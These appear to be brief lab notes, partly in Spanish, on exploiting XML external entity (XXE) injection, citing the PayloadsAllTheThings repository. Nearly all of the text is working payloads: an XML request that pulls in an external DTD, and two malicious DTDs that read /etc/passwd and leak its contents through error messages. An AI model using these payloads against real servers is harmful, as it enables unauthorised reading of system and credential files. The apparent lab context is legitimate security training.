1 - Exploiting XXE using external entities to retrieve files

PayloadsAllTheThings/XXE Injection/README.md at master · swisskyrepo/PayloadsAllTheThings · GitHub

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY % local_dtd SYSTEM "http://localhost:40817/feedback/screenshots/7.xml">
    %local_dtd;
]>
<stockCheck><productId>2</productId><storeId>1</storeId></stockCheck>

DTD QUE GENERA UN ERROR :

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

DTD QUE GENERA UN ERROR ll :

<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; leak SYSTEM '%data;:///'>">
%eval;
%leak;